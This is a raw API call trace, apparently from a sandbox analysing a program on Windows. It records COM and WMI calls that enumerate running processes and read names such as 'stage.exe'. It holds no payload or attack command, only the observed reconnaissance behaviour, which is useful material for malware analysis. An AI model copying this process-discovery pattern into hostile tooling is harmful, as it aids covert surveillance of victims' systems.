0x80004002 [0279.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc008) returned 0x0 [0279.208] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc008, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.208] WbemDefPath:IUnknown:Release (This=0x56fc008) returned 0x3 [0279.208] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.208] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.208] WbemDefPath:IUnknown:Release (This=0x5a9cd8) returned 0x2 [0279.208] WbemDefPath:IUnknown:Release (This=0x5a9cd8) returned 0x1 [0279.208] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.208] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9cd8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9cd8) returned 0x0 [0279.208] WbemDefPath:IUnknown:AddRef (This=0x5a9cd8) returned 0x3 [0279.208] WbemDefPath:IUnknown:Release (This=0x5a9cd8) returned 0x2 [0279.208] WbemDefPath:IWbemPath:SetText (This=0x5a9cd8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2372\"") returned 0x0 [0279.209] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.209] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.209] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.209] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.209] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.209] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.209] IWbemClassObject:Get (in: This=0x5962c0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c326c*=0, plFlavor=0x27c3270*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="central rule.exe", varVal2=0x0), pType=0x27c326c*=8, plFlavor=0x27c3270*=0) returned 0x0 [0279.209] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0279.209] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0279.210] IWbemClassObject:Get (in: This=0x5962c0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c326c*=8, plFlavor=0x27c3270*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="central rule.exe", varVal2=0x0), pType=0x27c326c*=8, plFlavor=0x27c3270*=0) returned 0x0 [0279.210] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0279.210] SysStringByteLen (bstr="central rule.exe") returned 0x20 [0279.210] CoTaskMemAlloc (cb=0x4) returned 0x56fc038 [0279.210] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc038, puReturned=0x27bb39c | out: apObjects=0x56fc038*=0x596458, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x596458) returned 0x0 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.223] IUnknown:AddRef (This=0x596458) returned 0x3 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x59645c) returned 0x0 [0279.223] IMarshal:GetUnmarshalClass (in: This=0x59645c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.223] IUnknown:Release (This=0x59645c) returned 0x3 [0279.223] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.223] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.223] IUnknown:QueryInterface (in: This=0x596458, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.223] IUnknown:Release (This=0x596458) returned 0x2 [0279.223] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.223] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.224] IUnknown:QueryInterface (in: This=0x596458, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x596458) returned 0x0 [0279.224] IUnknown:AddRef (This=0x596458) returned 0x4 [0279.224] IUnknown:Release (This=0x596458) returned 0x3 [0279.224] IUnknown:Release (This=0x596458) returned 0x2 [0279.224] CoTaskMemFree (pv=0x56fc038) [0279.224] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.224] IUnknown:AddRef (This=0x596458) returned 0x3 [0279.224] IWbemClassObject:Get (in: This=0x596458, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.224] IWbemClassObject:Get (in: This=0x596458, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.224] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x66 [0279.224] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x66 [0279.224] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.225] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.225] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.225] IUnknown:Release (This=0x500344) returned 0x1 [0279.225] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc038) returned 0x0 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc038, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.226] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc038, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5701ef0) returned 0x0 [0279.226] WbemDefPath:IUnknown:Release (This=0x56fc038) returned 0x0 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5701ef0) returned 0x0 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.226] WbemDefPath:IUnknown:AddRef (This=0x5701ef0) returned 0x3 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc048) returned 0x0 [0279.226] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc048, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.226] WbemDefPath:IUnknown:Release (This=0x56fc048) returned 0x3 [0279.226] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.226] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.226] WbemDefPath:IUnknown:Release (This=0x5701ef0) returned 0x2 [0279.226] WbemDefPath:IUnknown:Release (This=0x5701ef0) returned 0x1 [0279.226] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.227] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701ef0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5701ef0) returned 0x0 [0279.227] WbemDefPath:IUnknown:AddRef (This=0x5701ef0) returned 0x3 [0279.227] WbemDefPath:IUnknown:Release (This=0x5701ef0) returned 0x2 [0279.227] WbemDefPath:IWbemPath:SetText (This=0x5701ef0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2384\"") returned 0x0 [0279.227] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.227] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.227] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.227] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.227] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.227] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.227] IWbemClassObject:Get (in: This=0x596458, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c3af0*=0, plFlavor=0x27c3af4*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="stage.exe", varVal2=0x0), pType=0x27c3af0*=8, plFlavor=0x27c3af4*=0) returned 0x0 [0279.227] SysStringByteLen (bstr="stage.exe") returned 0x12 [0279.227] SysStringByteLen (bstr="stage.exe") returned 0x12 [0279.227] IWbemClassObject:Get (in: This=0x596458, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c3af0*=8, plFlavor=0x27c3af4*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="stage.exe", varVal2=0x0), pType=0x27c3af0*=8, plFlavor=0x27c3af4*=0) returned 0x0 [0279.227] SysStringByteLen (bstr="stage.exe") returned 0x12 [0279.227] SysStringByteLen (bstr="stage.exe") returned 0x12 [0279.227] CoTaskMemAlloc (cb=0x4) returned 0x56fc078 [0279.227] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc078, puReturned=0x27bb39c | out: apObjects=0x56fc078*=0x5965f0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.229] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5965f0) returned 0x0 [0279.229] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.229] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.230] IUnknown:AddRef (This=0x5965f0) returned 0x3 [0279.230] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.230] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.230] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5965f4) returned 0x0 [0279.230] IMarshal:GetUnmarshalClass (in: This=0x5965f4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.230] IUnknown:Release (This=0x5965f4) returned 0x3 [0279.230] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.230] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.230] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.230] IUnknown:Release (This=0x5965f0) returned 0x2 [0279.230] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.230] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.230] IUnknown:QueryInterface (in: This=0x5965f0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5965f0) returned 0x0 [0279.230] IUnknown:AddRef (This=0x5965f0) returned 0x4 [0279.230] IUnknown:Release (This=0x5965f0) returned 0x3 [0279.230] IUnknown:Release (This=0x5965f0) returned 0x2 [0279.230] CoTaskMemFree (pv=0x56fc078) [0279.230] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.230] IUnknown:AddRef (This=0x5965f0) returned 0x3 [0279.230] IWbemClassObject:Get (in: This=0x5965f0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.231] IWbemClassObject:Get (in: This=0x5965f0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.231] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"") returned 0x66 [0279.231] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"") returned 0x66 [0279.231] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.231] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.231] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.231] IUnknown:Release (This=0x500344) returned 0x1 [0279.232] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc078) returned 0x0 [0279.232] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc078, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.232] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc078, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5701fd0) returned 0x0 [0279.232] WbemDefPath:IUnknown:Release (This=0x56fc078) returned 0x0 [0279.232] WbemDefPath:IUnknown:QueryInterface (in: This=0x5701fd0, riid=0x71d52a54*(Data1=0x0, 